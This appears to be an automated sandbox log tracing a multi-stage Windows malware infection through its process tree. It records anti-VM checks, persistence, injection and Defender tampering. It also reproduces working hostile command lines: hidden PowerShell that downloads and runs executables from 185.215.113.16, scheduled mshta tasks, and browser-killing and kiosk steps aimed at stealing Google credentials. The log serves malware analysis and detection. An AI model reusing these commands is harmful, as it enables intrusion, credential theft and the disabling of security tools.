C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\1091498001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1091498001\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 5606⤵
- Loads dropped DLL
- Program crash
PID:2848
-
-
-
C:\Users\Admin\AppData\Local\Temp\10011850101\62be2e4ee5.exe"C:\Users\Admin\AppData\Local\Temp\10011850101\62be2e4ee5.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\10011860101\ad8ebfe024.exe"C:\Users\Admin\AppData\Local\Temp\10011860101\ad8ebfe024.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1856 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2808
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091546001\2164843fd0.exe"C:\Users\Admin\AppData\Local\Temp\1091546001\2164843fd0.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\1091548001\ed90bc6894.exe"C:\Users\Admin\AppData\Local\Temp\1091548001\ed90bc6894.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2852 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3024
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091549001\2fc4862a06.exe"C:\Users\Admin\AppData\Local\Temp\1091549001\2fc4862a06.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2464
-
-
C:\Users\Admin\AppData\Local\Temp\1091550001\b711227598.exe"C:\Users\Admin\AppData\Local\Temp\1091550001\b711227598.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
-
C:\Users\Admin\AppData\Local\Temp\1091551001\53d97ceeb1.exe"C:\Users\Admin\AppData\Local\Temp\1091551001\53d97ceeb1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:3068
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1804
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091552001\025263805b.exe"C:\Users\Admin\AppData\Local\Temp\1091552001\025263805b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2844 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091553001\ftS1RPn.exe"C:\Users\Admin\AppData\Local\Temp\1091553001\ftS1RPn.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2476
-
-
C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe"C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2088 -
C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe"C:\Users\Admin\AppData\Local\Temp\1091554001\DF9PCFR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2496
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091555001\uXivbut.exe"C:\Users\Admin\AppData\Local\Temp\1091555001\uXivbut.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2968 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1256 -
C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe"C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1104
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091556001\8QQOJj9.exe"C:\Users\Admin\AppData\Local\Temp\1091556001\8QQOJj9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1748
-
-
C:\Users\Admin\AppData\Local\Temp\1091557001\5aeda337ba.exe"C:\Users\Admin\AppData\Local\Temp\1091557001\5aeda337ba.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:1788
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3444
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091558001\7tzlyz8.exe"C:\Users\Admin\AppData\Local\Temp\1091558001\7tzlyz8.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2488
-
-
C:\Users\Admin\AppData\Local\Temp\1091559001\206f21b5b7.exe"C:\Users\Admin\AppData\Local\Temp\1091559001\206f21b5b7.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1736
-
-
C:\Users\Admin\AppData\Local\Temp\1091560001\8891a969d4.exe"C:\Users\Admin\AppData\Local\Temp\1091560001\8891a969d4.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1512 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2972
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091561001\c025a997b8.exe"C:\Users\Admin\AppData\Local\Temp\1091561001\c025a997b8.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:776 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:904 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2069758,0x7fef2069768,0x7fef20697785⤵PID:1664
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:2216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:25⤵PID:1292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:85⤵PID:1936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:85⤵PID:1660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2228 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2236 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1180 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:25⤵PID:3200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1128 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:3420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3508 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:85⤵PID:3472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3544 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:85⤵PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3688 --field-trial-handle=1220,i,3006663445213483830,2088093597293895669,131072 /prefetch:85⤵PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\5x47q" & exit4⤵
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091562101\c8eeb9dd28.exe"C:\Users\Admin\AppData\Local\Temp\1091562101\c8eeb9dd28.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn VDKZMmaZFdj /tr "mshta C:\Users\Admin\AppData\Local\Temp\l9CNrNnwk.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:3052 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn VDKZMmaZFdj /tr "mshta C:\Users\Admin\AppData\Local\Temp\l9CNrNnwk.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1564
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\l9CNrNnwk.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2936 -
C:\Users\Admin\AppData\Local\TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE"C:\Users\Admin\AppData\Local\TempUOIKFFCJPXOLRDSRF5JQIRTHBLAHV9ER.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1091563021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:1292 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091563021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
PID:1632 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:3228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:3608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:3700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Rdvo2ma80vL" /tr "mshta \"C:\Temp\DmKL2ETcq.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3800
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\DmKL2ETcq.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:3816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3864 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3764
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091564001\4d87c83574.exe"C:\Users\Admin\AppData\Local\Temp\1091564001\4d87c83574.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3172
-
-
C:\Users\Admin\AppData\Local\Temp\1091565001\e3ac3cdab5.exe"C:\Users\Admin\AppData\Local\Temp\1091565001\e3ac3cdab5.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2412
-
-
C:\Users\Admin\AppData\Local\Temp\1091566001\779f2e3cef.exe"C:\Users\Admin\AppData\Local\Temp\1091566001\779f2e3cef.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1448
-
-
C:\Users\Admin\AppData\Local\Temp\1091567001\962135d7e8.exe"C:\Users\Admin\AppData\Local\Temp\1091567001\962135d7e8.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3480 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3352
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:1132
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1368 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1368.0.1702619516\772030950" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1080 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {847e58a9-b370-4a33-9c6c-65b0b07ed72b} 1368 "\\.\pipe\gecko-crash-server-pipe.1368" 1328 10ad8058 gpu6⤵PID:2900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1368.1.961699492\2012635765" -parentBuildID 20221007134813 -prefsHandle 1548 -prefMapHandle 1544 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {caf0572b-619b-4470-b0e4-2f496a096c28} 1368 "\\.\pipe\gecko-crash-server-pipe.1368" 1560 cdeb258 socket6⤵PID:3428
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1368.2.1211080342\1283431969" -childID 1 -isForBrowser -prefsHandle 1972 -prefMapHandle 1968 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {80fdcb1e-0f3a-42e1-a7bf-8f1ad9a4b773} 1368 "\\.\pipe\gecko-crash-server-pipe.1368" 1984 19d59758 tab6⤵PID:3732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1368.3.1333168967\1405192959" -childID 2 -isForBrowser -prefsHandle 2828 -prefMapHandle 2824 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 568 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d050e96-390c-4d5e-a2db-298af5d5f4f0} 1368 "\\.\pipe\gecko-crash-server-pipe.1368" 2840 1bbf4a58 tab6⤵PID:3976
-
-
